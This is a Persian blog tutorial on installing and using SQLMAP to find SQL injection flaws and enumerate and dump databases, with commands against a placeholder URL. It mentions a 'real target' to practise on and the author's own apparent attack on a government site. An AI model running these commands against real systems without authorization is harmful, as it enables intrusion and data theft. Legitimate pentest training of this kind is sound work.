آموزش کار با SQLMAP
- کورش سنایی
- ۱۵ بهمن ۱۴۰۳
- زمان مطالعه: 5 دقیقه
سلام و درود به همگی خیلی خوش آمدید به آموزش کار با SQLMAP که خوب البته این ابزار از خیلی وقت پیش مورد استفاده قرار گرفته و همچنین آموزش های زیادی رو هم براش تولید کردن که شما بتونید باهاش کار کنید و ماهم قراره همین کارو کنیم منتها هیچ آموزشی آموزش زیرزمینی ما نمیشه در انتهای این آموزش کار با اس کیو ال مپ شما روی تارگت واقعی کار میکنید و یاد میگیرید چطوری ازش استفاده کنید و کارتونو راه بندازید پس ; بزن بریم . . . .
آموزش کار با SQLMAP به صورت ویدیویی به همراه تارگت برای هک
همونطور که در ویدیوی بالا دیدید ما به شما یک Cheat Sheet دادیم تا بتونید از روی اون دستورات SQLMAP رو اجرا کنید و بتونید نتیجه بگیرید همچنین با هم یک تارگت رو مورد هدف قرار دادیم که شما هم همین الان میتونید روی این هدف کار کنید و روی این ابزار با کمی تلاش مسلط بشید خیلی سخت نیست ولی بعضی وقتا قلقی میشه که خوب باید توی تجربه و اینها رفع کنید این مشکل رو همچنین این رو هم بگم که بعضی وقتا نیاز هست که به صورت دستسی یک هدف رو اکسپلویت کنید که در دوره وب هکینگ زیرزمین سایبری همه این موارد رو آموزش دادیم .
اشنایی با SQLMAP برای اکسپلویت آسیب پذیری Sql injection
در دنیای امنیت سایبری، یکی از رایجترین آسیبپذیریها، تزریق SQL (SQL Injection) است. این آسیبپذیری زمانی رخ میدهد که یک مهاجم بتواند دستورات SQL را به پایگاهداده تزریق کند و به دادههای حساس دسترسی پیدا کند یا تغییراتی در پایگاهداده ایجاد کند. برای شناسایی و تست این آسیبپذیری، ابزارهای مختلفی وجود دارد که یکی از معروفترین آنها SQLMAP است. در این مقاله، به آموزش کار با SQLMAP میپردازیم. البته همیشه باید توجه داشته باشید که اول باید بفهمید دارید چیکار میکنید بعد برید سراغ استفاده از ابزار ها تا از Script Kiddie بودن در بیاین .
sqlmap چیست؟
SQLMAP یک ابزار متنباز و قدرتمند برای تست نفوذ به پایگاههای داده است. این ابزار به صورت خودکار فرآیند تشخیص و بهرهبرداری از آسیبپذیریهای تزریق SQL را انجام میدهد. SQLMAP از انواع پایگاههای داده مانند MySQL، PostgreSQL، Oracle، SQL Server و غیره پشتیبانی میکند. همچنین این ابزار نمونه های مشابه ای هم داره که خوب این در بین رقیب های خودش بهتر عملکرده ولی خوب مثلا پیش اومده که خودم داشتم یک سایت دولتی رو میزدم که Blind بود و SQLMAP نتونست ولی رقیبش Ghauri تونست !
آموزش نصب SQLMAP
SQLMAP به زبان پایتون نوشته شده است و برای اجرای آن نیاز به پایتون دارید. مراحل نصب به شرح زیر است:
نصب پایتون: اگر پایتون روی سیستم شما نصب نیست، از پایتون.org آن را دانلود و نصب کنید.
دانلود SQLMAP: آخرین نسخه SQLMAP را از گیتهاب دانلود کنید.
اجرای SQLMAP: پس از دانلود، به پوشه SQLMAP بروید و از دستور زیر برای اجرا استفاده کنید:
python sqlmap.py
//OR
sqlmap
اگر در سیستم عامل لینوکس هستید و برای مثال از Ubuntu دارید استفاده میکنید از دستور زیر میتونید برای نصب این ابزار استفاده کنید اگر هم که کالی لینوکس دارید که به صورت پیش فرض اگه همه چیز درست نصب شده باشه (منظورم سیستم عامل هست ) باید به صورت پیش فرض نصب باشه اگر نبود از دستور زیر استفاده کنید در لینوکس های Debian Base :
apt update
apt install -y sqlmap
آموزش استفاده از SQLMAP
اول که باید هدفتون رو به ابزار بدید در واقع لینکی که بهش مشکوک هستید رو به ابزار بدید تا برسی کنه ( این مرحله اجباری نیست و میتونه با مرحله بعدی ادغام بشه ) :
- مرحله اول شناسایی آسیب پذیری
sqlmap -u "http://example.com/page?id=1"
-u: آدرس URL مورد نظر را مشخص میکند Sqlmap به طور خودکار پارامترهای URL را بررسی میکند و در صورت وجود آسیبپذیری، آن را گزارش میدهد.
2. دریافت اطلاعات پایگاهداده
اگر آسیبپذیری وجود داشته باشد، میتوانید اطلاعات پایگاهداده را استخراج کنید. برای مثال:
sqlmap -u "http://example.com/page?id=1" --dbs
--dbs: لیست تمام پایگاههای داده موجود را نمایش میدهد.
3. دریافت جداول یک پایگاهداده
برای دریافت لیست جداول یک پایگاهداده خاص، از دستور زیر استفاده کنید:
sqlmap -u "http://example.com/page?id=1" -D نام_پایگاه_داده --tables
-D: نام پایگاهداده را مشخص میکند.
--tables: لیست جداول پایگاهداده را نمایش میدهد.
4. دریافت ستونهای یک جدول
برای دریافت ستونهای یک جدول خاص، از دستور زیر استفاده کنید:
sqlmap -u "http://example.com/page?id=1" -D نام_پایگاه_داده -T نام_جدول --columns
-T: نام جدول را مشخص میکند.
--columns: لیست ستونهای جدول را نمایش میدهد.
5. دریافت دادههای یک جدول
برای دریافت دادههای یک جدول، از دستور زیر استفاده کنید:
sqlmap -u "http://example.com/page?id=1" -D نام_پایگاه_داده -T نام_جدول --dump
--dump: دادههای جدول را استخراج و نمایش میدهد.
حالا این مابین که شما دارید کار خودتونو انجام میدید یکسری سوالاتی رو هم ازتون SQLMAP میپرسه که شما با Y/N باید بهش جواب بدید اگر میخواین فرآیند به صورت اتوماتیک انجام بشه و سوال ها به صورت پیش فرض پاسخ داده بشن میتونید از دستور زیر استفاده کنید :
sqlmap -u "http://example.com/page?id=1" --batch
به صورت کلی امیدوارم از این آموزش کار با SQLMAP خوشتون اومده باشه و در جهت تکمیل مباحث وبسایت زیرزمین سایبری خوشحال میشیم که از بخش نظرات پیشنهادات خودتون رو با ما در میان بزارید تشکر 🙂
